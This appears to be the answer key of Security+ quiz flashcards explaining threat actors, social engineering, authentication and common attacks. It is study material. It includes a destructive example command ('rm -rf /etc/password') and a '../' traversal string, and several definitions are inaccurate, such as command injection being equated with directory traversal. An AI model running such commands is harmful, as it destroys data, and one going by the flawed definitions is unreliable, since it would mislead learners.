Session hijack – This attack occurs when an attacker attempts to take over a session that is already occurring. Encryption is a mitigation for this attack.

Rootkit – A rootkit is a set of software tools that allow an attacker to gain control of a device. The best mitigation is to remove all rootkits.

Answer 89

A

Vishing is a special type of phishing that uses VoIP. Often these types of attacks involve receiving telephone calls that appear to come from a trusted source, such as your financial institution. The telephone call asks you to disclose confidential information that can be used to access your account.

An Xmas attack is an attack that looks for open ports. Nmap is the most popular application that is used to carry out this type of attack.

Spear phishing is a special type of phishing that appears to come from a trusted individual. Digital Signatures can help protect against spear phishing attacks, and improve the overall security posture, by assuring employees that an email originated from the CEO.

Whaling is a special type of phishing that targets a single power user, such as a Chief Executive Officer (CEO). Whaling is used to gain confidential information about the company, and usually occurs via email.

Answer 90

A

Some threat actors simply want to cause disruption and chaos. A threat actor might be motivated by this technique to gain notoriety by claiming responsibility for the event. Whatever the event, their goal is to upset normal operations in an attention-getting way.

Answer 91

A

Service disruption is meant to damage an organization’s reputation, or cause loss of public confidence in the organization. If an airline had a disruption where you could not access their services, such as booking a flight, that person would likely do business with another airline. It may have any motivation, including revenge or financial gain. The purpose of service disruption is to harm a specific organization, while attackers who are motivated to create disruption and chaos will choose any random, vulnerable target.

Answer 92

A

Ethical hackers want to prevent an event, not cause one and take credit for it. Ethical hackers (sometimes called white-hat hackers or penetration testers) are individuals hired by the company to test the company’s security infrastructure. Their purpose is to conduct activities to find weaknesses and “break in”. The ethical hacker will prepare a report detailing the weaknesses so that the client company can address those issues and make corrections.

Answer 93

A

Militaries and civilians can be motivated by war. Civilians and nation-states can use cyberspace to advance wartime agendas. Each may be engaged in activities that disrupt a target’s communications, services, and infrastructure, or to spread propaganda, misinformation, and fear. Nation-states want cyber-attacks that advance wartime agendas to remain secret so that the target states are unaware of their actions.

Answer 94

A

Espionage – Competition attacks are the modern version of industrial espionage. Theft of intellectual property, marketing plans, and customer lists are all examples that can have devastating effects on the targeted organization. Even stealing the victim company’s credit card list can have a severe economic impact on that company. Often, the attacking company will find a disgruntled individual in the subject company to carry out the attack.

Blackmail – Blackmail is the threat to release sensitive PII or incriminating evidence regarding an individual who has access to certain company assets, such as data, systems, or processes. The cyber-criminal threatens to expose the individual unless they take some action against a company asset on the criminal’s behalf.

Data exfiltration – Data exfiltration is the act of sending sensitive or proprietary information to unauthorized recipients external to the organization. Data loss prevention is designed to detect and stop data exfiltration behavior by users. If DLP software is not present, data exfiltration might only be discovered after the event. When it occurs, the best course of action is to identify the source of the disclosure, if possible, and then take disciplinary action.

Philosophical or political beliefs – Philosophical beliefs and political beliefs are used by extremist groups to recruit members to their cause. One nation might attempt to convince citizens of another nation to perform cyberterrorist activities. Hacktivists are the typical actor here.

Revenge – threat actors can be motivated by revenge. Revenge and retaliation result from the perception that the threat actor has been slighted by a person or organization. The threat actor wants to “teach them a lesson” or extract revenge.

Answer 95

A

Organized crime most commonly conducts cyber-attacks for their personal financial gain. This is exemplified by activities such as fraud, ransom attacks, and theft of credit card data. Once the threat actor has your information, they can sell it or use it for fraudulent purposes.

Answer 96

A

A smurf attack is a combination of Internet Protocol (IP) spoofing and the saturation of a network with Internet Control Message Protocol (ICMP) messages. To initiate a smurf attack, a hacker sends ICMP messages from a computer outside a network with a spoofed IP address of a computer inside the network. The ICMP message is broadcast on the network, and the hosts on the network attempt to reply to the spurious ICMP message. A smurf attack causes a denial-of-service (DoS) on a network because computers are busy responding to the ICMP messages. The IP spoofing part of a smurf attack can be countered by configuring a router to ensure that messages with IP addresses inside the network originate on the private network side of the router.

Answer 97

A

A SYN flood attack occurs when an attacker exploits the three-packet Transmission Control Protocol (TCP) handshake. A SYN flood attack is a type of denial-of-service (DoS) attack.

Answer 98

A

A rootkit is a collection of programs that grants a hacker administrative access to a computer or network. The hacker first gains access to a single system, and then uploads the rootkit to the hacked system. An example of a rootkit is a system-level kernel module that modifies file system operations. If a server dedicated to the storage and processing of sensitive information is compromised with a rootkit and sensitive data was exfiltrated, you should wipe the storage, reinstall the OS from original media, and restore the data from the last known good backup.

Answer 99

A

Authentication refers to the process of verifying the identity of users. Authentication technologies that you need to understand include the following:

Tokens – a small device that generates time-sensitive passwords

Common access cards – similar to smart cards and are used by the U.S. federal government for active-duty military personnel

Smart cards – small plastic cards that contains authentication information

Multifactor authentication – when multiple authentication factors are used to authenticate a user.

Answer 100

A

For the Security+ exam, you must understand the following authentication factors: something you are, something you have, and something you know. You also need to understand two additional authentication attributes: somewhere you are and something you do.

Answer 101

A

TOTP – A time-based one-time password is an extension of the HOTP that is modified to support a time-based moving factor. If an organization introduces token-based authentication to system administrators due to risk of password compromise, and the tokens have a set of numbers that automatically change every 30 seconds, TOTP is being used.

Answer 102

A

HOTP – An HMAC one-time password is an algorithm that is used to generate a password that is used once.

HOTP stands for HMAC-based One-Time Password. It is a one-time password (OTP) algorithm based on HMAC (Hash-based Message Authentication Code). HOTP is used for generating a short-lived password that is valid for only one authentication session or transaction, enhancing security by ensuring that passwords cannot be reused or intercepted for future use.

Answer 103

A

CHAP – Challenge Handshake Authentication protocol is an authentication protocol that validates the identity of the remote user.

Answer 104

A

PAP – Password Authentication protocol is an authentication protocol that uses a password.

Answer 105

A

Single sign-on – an authentication technology that allows a user to log in once and be granted access to different systems configured as part of the network

Answer 106

A

Implicit deny – when a user inherits a deny permission based on his membership is a group or role

Answer 107

A

Authorization allows users to access resources. Authorization is typically applied to a user account after a user is authenticated on a network.

Answer 108

A

Trusted OS – an operating system that provides support for multilevel security

Answer 109

A

Least privilege – This principle ensures that users are granted only those permissions they need to do their work

Answer 110

A

Separation of duties – This principle ensures that tasks are divided between users to ensure that one user cannot commit fraud.

Answer 111

A

Access Control List (ACL) – Access control lists are configured to control permissions to resources.

Answer 112

A

Time of day restrictions – This method configures the time(s) and day(s) that users are allowed to access resources. In some cases, this policy also allows administrators to configure the location from which the user can log in.

Answer 113

A

Authentication, authorization, and accounting (AAA) is a term for controlling access to computer resources using authentication, enforcing policies using authorization, and auditing usage and providing the information necessary to bill for services using accounting.

Answer 114

A

Resource reuse vulnerability is often associated with cloud computing. In cloud computing, a resource such as memory, a file or an application may be used by multiple customers. When the customer is finished with the item they are using, such as memory, the cloud provider should sanitize it by writing all zeroes to the memory. Doing so ensures that when the next customer uses the memory, that memory does not have any trace data from the previous customer. Failure to sanitize the memory during the transition from one customer to another introduces the possibility of a resource reuse vulnerability.

Answer 115

A

Email is estimated to be responsible for more than 90% of all attacks. All it takes is one unsuspecting user to open the wrong attachment, or click on a bogus link, to compromise the organization. There are several varieties of email attacks, such as phishing, spear phishing, whaling, and others. Spear phishing targets a specific individual, while whaling targets a high-level person (typically C-level) in the organization.

Some methods of preventing email attacks include blocking messages from senders with bad domain reputations, throttling or blocking messages from known bad IP addresses, using email authentication to ensure that senders are authorized, and bulk filtering of user mailboxes.

Answer 116

A

Typo-squatting, also known as URL hijacking, relies on mistakes made by users when they input web addresses. Another type of URL hijacking involves replacing the source behind a link in a search engine index and redirecting to a false URL.

Answer 117

A

A URL hijacking, or typo-squatting, attack relies on mistakes made by users when they input Web addresses. Another type of URL hijacking involves replacing the source behind a link in a search engine index and redirecting to a false URL.

Answer 118

A

A watering hole attack occurs when an attacker profiles victims to discover the sites they visit. The attacker then accesses the most commonly accessed sites for vulnerabilities. Once a vulnerability is discovered, the attacker then compromises the site and redirects users to an alternative site that will infect the computers of users who access this alternative site. This attack may also be called a waterhole attack.

Answer 119

A

You should deploy a virtual local area network (VLAN). This type of network can be used to ensure that Internal access to other parts of the network is controlled and restricted. A VLAN is usually created using a switch. VLAN segregation protects each individual segment by isolating the segments. VLAN segregation is best used to prevent ARP poisoning attacks across a network. VLANs provide a layer of protection against sniffers and can decrease broadcast traffic. Creating a VLAN is much simpler than using firewalls or implementing a virtual private network (VPN). A VLAN is a good solution if you need to separate two departments into separate networks. VLAN management is implemented at the switch to configure the VLANs and the nodes that are allowed to participate in a particular VLAN. You can configure a switch to allow only traffic from computers based upon their physical (MAC) address.

Answer 120

A

Intranet – a network connection within an organization that is designed for business-to-employee communication.

Wireless – a network connection that allows personnel and guests to connect without using wires.

Guest – a network that is set aside for guest usage that is usually isolated from the Internal network and given limited connection capabilities.

Honeynet – a set of honeypots that appear to be attractive targets but are actually traps for attackers.

Network address translation (NAT) – a technology that allows resources that are using private IP addresses to communicate with the Internet through the NAT device and using a single public IP address.

Ad hoc – a network that consists of a group of devices communicating wirelessly without a wireless access point.

Answer 121

A

Physical – a type of segmentation whereby different segments of the network are separated by physical devices, such as routers and firewalls.

Logical (VLAN) – a type of segmentation whereby different segments of the network are virtually separated using a switch.

Virtualization – a type of isolation whereby multiple guest machines reside on a single physical computer.

Air gaps – an isolation technique whereby a computer is not connected to any network to prevent security issues, or an IoT device is prevented from connecting to external networks.

Answer 122

A

Nation-state / Advanced Persistent Threat (APT) attacks would most likely have the most resources available. These attacks are conducted by one nation upon another, or upon a significant entity within the target country, with large sophisticated attacks. APTs have attackers who have very significant amounts of time and funding resources. Motives could be financial, political, disruption of the economy, or theft of intellectual property, such as military secrets. They are a highly skilled group of attackers that keep their presence hidden so that they can continually exploit their targets and launch layered attacks, known as establishing a foothold.

Answer 123

A

Unskilled attackers (sometimes referred to as script kiddies) typically rely on tools that are widely available on the Internet. They are often motivated by the thrill of the chase and by the need to prove that they can do it. For the most part, they have limited time and financial resources.

Answer 124

A

Another way to detect a threat actor attribute is to use open-source intelligence. There are several websites and tools available to assist you. One is ThreatCrowd (www.threatcrowd.org), which allows you to examine several types of attacks.

Another website is https://openphish.com, which gives you the most current information on phishing attacks. To summarize the attributes of the various threat actors that you should know for the SY0-701 exam:

Internal or external – Attackers can come from within a target organization, making the threat actor Internal. Nation/states, by contrast, would be external threat actors.

Level of sophistication – Script kiddies are typically the least sophisticated, whereas nation/states would be the most sophisticated.

Resources and funding – Nation/states would have the most time, resources, and funding, followed by organized crime. Script kiddies would have the least resources available.

Intent and motivation – The intent of a script kiddie might be to simply prove that they can do it, whereas the intent and motivation of a hacktivist could be a moral or political issue.

Answer 125

A

A terrorist attack is most likely a politically motivated threat. A terrorist attack is usually an attack against a particular country’s view from a group that opposes the philosophical or political beliefs of that country. Often, a particular group takes credit for a terrorist attack. Politically motivated threats include strikes, riots, civil disobedience, and terrorist attacks.

Answer 126

A

Supply system threats include power outages, communications interruptions, and water and gas interruption.

Answer 127

A

Buffer overflow – an attack that occurs when an application receives more data than it is programmed to accept

Cross-site scripting (XSS) – an attack that allows code injection by hackers into the Web pages viewed by other users

Session hijacking – an attack that occurs when user validation information is stolen and used to establish a connection

Zero-day attack – an attack that occurs on the day when an application vulnerability has been discovered

Answer 128

A

The attacker used pretexting and impersonation to commit physical social engineering. Pretexting (when referring to social engineering) is inventing a scenario that will engage the victim and provide the attacker with an excuse to be in the area. Impersonation is pretending to be an employee, vendor, IT help desk staff, delivery driver, or other individual with some level of legitimate access. Impersonation can occur on the phone or in person. In this scenario, the guard should have asked an employee inside the building to verify that an authorized work crew was on the grounds.

While this was an impersonation, it was not identity fraud. Identity fraud is stealing a specific individual’s PII or credentials to commit financial fraud, elicit information, gain access to confidential records, or penetrate a network. Impersonation is generic, while identity fraud is specific.

The attacker did not elicit information. Eliciting information is tricking the victim into revealing sensitive information, like shift times and manned desk hours, through friendly conversation.

An influence campaign is a multi-actor attack that uses social media accounts to post inflammatory rhetoric and unsubstantiated or fake news stories. The goal of the disinformation is to cause political, social, and economic instability in the target. Influence campaigns are usually conducted by APTs and hostile nation-states.

Physical social engineering uses in-person techniques to gather confidential information or gain access. Other human vector or physical social engineering tricks are dumpster diving, shoulder surfing, tailgating / piggybacking, and reconnaissance. Remember that in the CompTIA objectives, reconnaissance can mean visiting a target to observe security controls in person, but it can also refer to digital and remote intelligence gathering techniques using OSINT and automated tools.

Answer 129

A

The file server has become the victim of a denial-of-service (DoS) attack. Because multiple routers and servers are involved in the attack, a distributed DoS (DDoS) attack has actually occurred. A DDoS attack usually involves the hijacking of several computers and routers to use as agents of the attack. Multiple servers and routers involved in the attack often overwhelm the bandwidth of the attack victim. For example, if a server has intermittent connection issues, the logs show repeated connection attempts from the same IP addresses, and the attempts are overloading the server to the point it cannot respond to traffic, then the server is experiencing a DDoS attack.

Answer 130

A

Privilege escalation usually occurs by logging in to a system using your valid user account and then finding a way to access files that you do not have permission to access. This often involves invoking a program that can change your permissions, such as Set User ID (SUID) or Set Group ID (SGID) or invoking a program that runs in an administrative context. There are several methods of dealing with privilege escalation, including using least privilege accounts, privilege separation, and so on. Privilege escalation can lead to denial-of-service (DoS) attacks. An example of privilege escalation is gaining access to a file you should not access by changing the permissions of your valid account. Privilege escalation is also a concern for users with administrative-level accounts. If a user needs administrative-level access, the user should be given two user accounts: one administrative-level account and one regular user account. The user should use the regular user account for most activities and use the administrative-level account only to perform administrative duties.

Answer 131

A

Backdoors are hidden applications that vendors create to ensure that they are able to access their devices. After installing new devices or operating systems, you need to ensure that all backdoors and default passwords are either disabled or reset. Often, hackers first attempt to use such backdoors and default passwords to access new devices.

Answer 132

A

A man-in-the-middle attack occurs when a hacker intercepts messages from a sender, modifies those messages, and sends them to a legitimate receiver.

Answer 133

A

An evil twin is an access point with the same SSID as the legitimate access point. It is a special type of unauthorized access point.

Answer 134

A

A rogue access point is an unauthorized access point that allows access to a secure network. Performing a site survey is the best way to discover rogue access points. Discovering a large number of unauthorized wireless connections in a particular area is a sign of a rogue access point.

Answer 135

A

An IV attack is cracking the WEP secret key using the initialization vector (IV). An IV attack involves interception of authentication traffic in an attempt to gain unauthorized access to a wireless network.

Answer 136

A

Another consideration in wireless networks is interference or jamming. If an organization implements multiple wireless access points, the organization must ensure that the access points do not interfere with each other. This can be accomplished in one of two ways: deploy the access points on different channels within the frequency or decrease the power level of the access point. Also, some electronic devices can cause interference with access points. Often, just moving the wireless access point can fix the issue.

Answer 137

A

Business email compromise is an attack that exploits the name and/or position of a high-ranking executive within the organization. The attacker will impersonate the executive in an email to the victim, typically an employee in the organization, asking them to perform tasks. One of the most common examples asks an employee to purchase dozens of gift cards.

Answer 138

A

Brand impersonation, also known as brand spoofing, is a type of phishing attack. Attackers will use a legitimate company’s assets, such as logos, banners, and images, to make it appear as though the email is coming from the legitimate company. The attackers may also create a fake website that mimics the legitimate website. As an example, the attacker creates a fake website that looks like a legitimate banking website. The attacker then sends an email to users asking them to log in to their account by clicking on the link to the fraudulent website. When the user enters their login credentials, the attacker can steal their information and use it for fraudulent purposes.

Answer 139

A

Misinformation and disinformation are types of influence campaigns designed to swing public opinion in a certain direction. Misinformation is the spread of incorrect information, usually because the initial facts were incorrect or misunderstood, without the intent to deceive. Disinformation is crafting and spreading deliberately inaccurate or false information with the intent to deceive.

Answer 140

A

Competition attacks are the modern version of industrial espionage. Theft of intellectual property, marketing plans, and customer lists are all examples that can have devastating effects on the targeted organization. Even stealing the victim company’s credit card list can have a severe economic impact on that company. Often, the attacking company will find a disgruntled individual in the subject company to carry out the attack.

Answer 141

A

A cloud access security broker (CASB) enforces proper security measures between a cloud solution and a customer organization. A CASB monitors user activities, notifies administrators about significant events, performs malware prevention and detection, and enforces compliance with security policies.

Answer 142

A

A secure web gateway (SWG) is a cloud-based web gateway that combines features of a Next-generation Firewall (NGFW) and a Web Application Firewall (WAF). SWG provides an ongoing update to filters and detection databases and is designed to provide filtering services between cloud-based resources and on-premises resources. SWG uses standard WAF functions, TLS decryption, CASB functions, sandboxing features, and threat detection functions to protect enterprises from the ever-evolving cloud-based risks and attacks.

Answer 143

A

Pharming – Web browser
Phishing – Email
Spimming – Social networks
Vishing, Smishing – Mobile phone

Answer 144

A

A spraying attack is not a cryptographic attack, but rather a type of brute-force password attack. A spraying attack has a couple of different forms. It may use a common or default password for an organization and test that against multiple accounts. “P@$$w0rd” is often used as a secure password, and in a larger organization, you are likely to find an account that uses this password. Another form would be to use a variation of a company’s slogan against a user list.

Answer 145

A

A collision attack is a cryptographic attack that combines brute force attacks, each with a different input, to produce the same hash value.

Answer 146

A

A downgrade attack is a cryptographic attack that causes the system to use less-stringent security controls. When these less-stringent (downgraded) security controls, typically insecure protocols, are activated, the attacker takes advantage of those less-than-secure settings. An example would be an attack that disables HTTPS port 443. In order for web traffic to go through, HTTP port 80 is enabled. HTTP is less secure protocol than HTTPS, and the attacker exploits HTTP.

Answer 147

A

A birthday attack is a type of cryptographic attack. A birthday attack is named after the mathematical probability that two people in the same network have the same birthday.

Answer 148

A

RFID cloning is the process of creating a copy of an RFID card or key fob that grants access to a facility. RFID cards contain a small chip that contains data about the holder of the card, such as their name, company role, and authorization to enter facilities. These cards use short-range radio waves to send this data to readers, which then use the card as a “key” to open doors. Hackers can clone these cards by using a card reader within reading distance of a card, and they can snag the data that is loaded on the chip remotely. This data can then be copied over to a blank card, and the hacker can essentially pose as a legitimate actor and use their RFID copy to go anywhere the real employee can.

A practical example of RFID cloning is when a hacker gains access to a facility by cloning an employee’s RFID card. The hacker can then move around the facility undetected and access sensitive areas. To prevent such attacks, businesses can leverage other forms of security hardware to fully protect their premises and maintain authorized access control. For example, a CCTV camera pointed at the card reader can detect and record any tampering by a hacker trying to install a skimmer. Likewise, cameras that have a field of vision over the approach to the front door reader can pick up on suspicious behavior, like a person with a bag trying to get within RFID-reading distance of employees and linger there.

Answer 149

A

The attacks and their mitigations should be matched in the following manner:

Cross-site request forgery (CSRF) – Validate both the client and server side.

Cross-site scripting (XSS) – Implement input validation.

Session hijacking – Encrypt communications between the two parties.

Malicious add-ons – Implement application allow lists.

It is important that you understand application attacks and how to prevent them.

Answer 150

A

DNS poisoning is the practice of dispensing IP addresses and host names with the goal of traffic diversion. Properly configured DNS security (DNSSEC) on the DNS server can provide message validation, which, in turn, would prevent DNS poisoning.

Answer 151

A

ARP poisoning is similar to DNS poisoning. In this attack, a malicious actor sends falsified ARP messages over a local area network. In a domain hijacking attack, the registration of a domain name is changed without the permission of the original registrant.

Answer 152

A

A collision attack or a birthday attack combines brute force attacks, each with a different input, to produce the same hash value. When two separate inputs create the same hash value, it is called a collision. A birthday attack is named after the mathematical probability that two people in the same network have the same birthday.

Answer 153

A

In a replay attack, the attacker sends the victim a previously accepted frame, such as one that includes a cryptographic key that has been sniffed by the attacker. The victim believes he is still in a valid communication, but the communication has been intercepted and exploited.

Answer 154

A

Memory injection is the primary goal of buffer overflow attacks. Buffer overflows attempt to put more information than can fit into an allocated area of memory. With memory injection, the attacker inserts malicious code into program memory. The computer then executes that malicious code as part of the program.

Answer 155

A

An SQL injection is an example of improper input handling, and the impact can include data destruction or unfettered access to the database. Inputs should be checked for common SQL injection symbols. Other examples of improper input handling include failure to validate the type of data in an input field, the length of the data, and proper date ranges.

Answer 156

A

A cross-site scripting (XSS) attack occurs when an attacker locates a vulnerability on a website that allows the attacker to inject malicious code into a web application. A persistent XSS attack occurs when data provided to the web application is first stored persistently on the server and later displayed to users without being encoded using HTML on the web client. A non-persistent XSS attack occurs when data provided by a web client is used immediately by server-side scripts to generate results for that user. XSS flaws occur every time an application takes user-supplied data and sends it to a web browser without first confirming or encoding the data.

Answer 157

A

You could use a sinkhole. A sinkhole is a routing mechanism that can route traffic from a device being flooded to a location where the traffic can be studied.

Answer 158

A

In a directory or path traversal attack, an attacker uses the application to access the file system below. Usually, this means figuring out where the application has access and then jumping out of that folder into other folders on the system using commands.

../

Answer 159

A

Steganography is typically used in image-based attacks, but can also be used with audio and video files. Steganography works by embedding messages or malicious code within images. The large size of these files makes it difficult to find the embedded data, unless you know exactly where to look and what to look for. This allows the attacker to transmit while “hiding in plain sight.”

Answer 160

A

A file-based threat vector is a type of cyberattack conducted via executable files on a computer or network. Attackers can use this method to gain unauthorized access to sensitive data, install malware, or cause other types of damage. For example, an attacker might send an email with an attachment that contains malicious code. When the user opens the attachment, the code executes and infects the computer with malware. Other examples of file-based threat vectors include downloading files from untrusted sources, using outdated software, and opening files from unknown sources. File-based threat vectors inject malicious code into what would seem to be a harmless file. Typical targets are spreadsheets and document files. One example of this type of malicious code is a macro.

Answer 161

A

Removable device exploitation can occur with USB drives or external hard drives. Attackers can use this method to load malware onto systems to launch cyber-attacks, with the aim of stealing sensitive information and causing system failures. For example, an attacker might leave a USB drive in an organization’s parking lot or send it as a gift to a target. Once the user inserts the device into their computer, the malware on the device can spread to other removable media or network drives, infecting the entire system.

Answer 162

A

Client-based attacks and agentless attacks are used against vulnerable software.

Client-based attacks exploit vulnerabilities within software running on a computer or mobile device. An example could be a vulnerability within a web browser that allows an attacker to install malware on the computer.

Agentless attacks use web applications and services to acquire information from a computer or mobile device. The acquisition can occur without the need of a software installation on the device.

Answer 163

A

Default credentials are a common threat vector, but it primarily targets hardware devices like routers and wireless access points. Someone will configure a device, such as a new router, and forget to change the default credentials used for setup. These credentials rarely change by brand, and a list of default credentials for many devices can be found at https://www.softwaretestinghelp.com/default-router-username-and-password-list/.

Answer 164

A

A SQL injection affects a database. In this type of attack, the interface is expecting a user to enter data, but the interface is not properly designed to only allow a specific data type. A malicious user can enter SQL code.

Answer 165

A

Command injection allows users to gain access to restricted directories. If an operating system command, such as rm -rf /etc/password, is submitted in an HTML string, a command injection (or directory traversal) attack has occurred. Command injection is also referred to as directory traversal.

Answer 166

A

XML injection occurs when a user enters values in an XML query that takes advantage of security loopholes.

Answer 167

A

LDAP injection occurs when a user enters values in an LDAP query that takes advantage of security loopholes.

Answer 168

A

Header manipulation – This attack occurs when a hacker is able to manipulate a packet header to deface, hijack, or poison the packet.

Answer 169

A

Malicious add-ons – This is an application add-on that a user adds for a particular functionality, but in reality serves as a way for a hacker to create a security breach.

Answer 170

A

Clickjacking involves putting a transparent button over an existing button (or image) on a web page. When the victim clicks the button, instead of going to the website they intended, they are routed to a different site where the attacker captures personal information. Amplification attacks are often part of a DDoS attack, usually associated with UDP protocols. The goal of this attack is to turn a simple query, such as DNS or NTP, into a flood of responses that overwhelms the victim’s network resources.

Answer 171

A

Pass the hash attacks exploit authentication protocol weaknesses, where the password hash remains the same between sessions until the password value changes.

Answer 172

A

Driver manipulation attacks change the information provided to a device driver. This results in the driver not being used at all or performing with unexpected results.

Answer 173

A

Shimming is a form of driver manipulation. An API library is created that changes the arguments (parameters) passed to the driver, bypasses the driver, or has the API deal with the driver operation.

Answer 174

A

Refactoring identifies the flow within an application’s code and changes the code without changing how the code appears to function. This is often used to identify exploitation opportunities in a weak area of an application’s code.

Answer 175

A

An SQL injection is an example of improper input handling, and the impact can include data destruction or unfettered access to the database. Inputs should be checked for common SQL injection symbols. Other examples of improper input handling include failure to validate the type of data in an input field, the length of the data, and proper date ranges.

Improper error handling could allow an attacker to crash a program. Error checking should be built into every module or code function. An error should not result in a crashed application, but rather generate an error message.

Misconfiguration or weak configuration can have a severe impact. For example, a user who (for convenience) selects weak or minimal security settings on a browser may impact the security of the entire organization. Misconfiguration, such as not changing the administrative username or password, can also have a significant impact. Systems and components, such as routers, should never be deployed with the default configuration enabled. As an example, many SOHO users are thrilled that they got their new wireless network to finally communicate “out of the box.” As a result, they do not change the default administrator information, leaving their network wide open for attack.

Answer 176

A

Wearable technology transmits data via Wi-Fi or Bluetooth to a host device, and as such is subject to data interception and attack. In addition to being subject to attack, wearable devices such as voice recorders, video recorders, and hidden cameras can also be used by an attacker to gain information.

UAVs operate far beyond the range of Wi-Fi and Bluetooth. Unmanned Aerial Vehicles (UAVs) or drones are controlled remotely, which is an inherent security risk. Aircraft/UAVs have multiple embedded systems, ranging from navigation to fuel control and ordnance delivery. Significant security systems must be incorporated to prevent these airborne vehicles from being compromised.

Medical devices transmit via wired connections, Wi-Fi, Bluetooth, or radio frequency (RF) signals established by the Wireless Medical Telemetry Service (WMTS) within the specific frequency bands allocated to medical devices. Medical devices can be manipulated to report false data, resulting in harm to the patient. They can also be manipulated to provide the wrong level of service to a patient, such as the flaw that was announced by the FDA with pacemakers whereby unauthorized users could manipulate the heartbeat rate or cause the battery to drain at a faster rate.

Automobiles with embedded technology are susceptible to hackers, but they usually use satellite or cellular communication. As an example, an air pressure sensor on a tire can be manipulated to show a low-pressure alert. When the consumer fills the tire sufficiently so that the alert stops, the tire is now overinflated. This can cause the tire to explode at highway speeds. Recently, security professionals have even demonstrated hacking into an automobile and driving it.

Answer 177

A

System processes provide well-defined operational guidelines for processes such as incident response, security policy, vulnerability management, and security awareness, to name a few. A Security Operations Center (SOC) operates 24x7 to maintain the organization’s security posture. The abovementioned system processes provide the guidelines that the SOC uses for its operations.

The Windows registry is a database that contains all the application settings and current configuration parameters for the hardware and software on a Windows system. Each machine running a Windows OS has a registry that contains keys (which identify applications, processes, hardware) and values (specific configuration data related to the key). For example, if a key was related to a printer, values associated with the key could include printing orientation, print history, default paper tray, and default paper size.

Logging levels are classifications that indicate the severity or urgency of the logged event. Common logging levels include Emergency, Alert, Critical, Error, Warning, Notice, and Debug.

System hardening increases the security of a server or a computer system by reducing vulnerabilities and the attack surface. Examples of system hardening activities include removing unnecessary software, closing down ports, and adjusting permissions.

Other important operating system (OS) concepts include the location of configuration files and hardware architecture in Windows and Linux.

The Windows OS uses the registry database for storing all configuration settings. In Linux, each application and process have its own configuration file. The Linux file structure uses the /etc/ directory for configuration file locations.

Hardware architecture is also an important concept. If the hardware is not secure, it would be very difficult to build secure applications and databases and to have high availability. Physical access to critical hardware, such as servers, routers, wireless access points, and network switches, is often overlooked. It is not uncommon that administrative passwords are set to the default, firmware does not get updated, and encryption is not adequate for the device.

Brainscape's Knowledge GenomeTM

Threat, Vulnerabilities and Mitigations: Quiz Revision Flashcards

Brainscape's Knowledge Genome^TM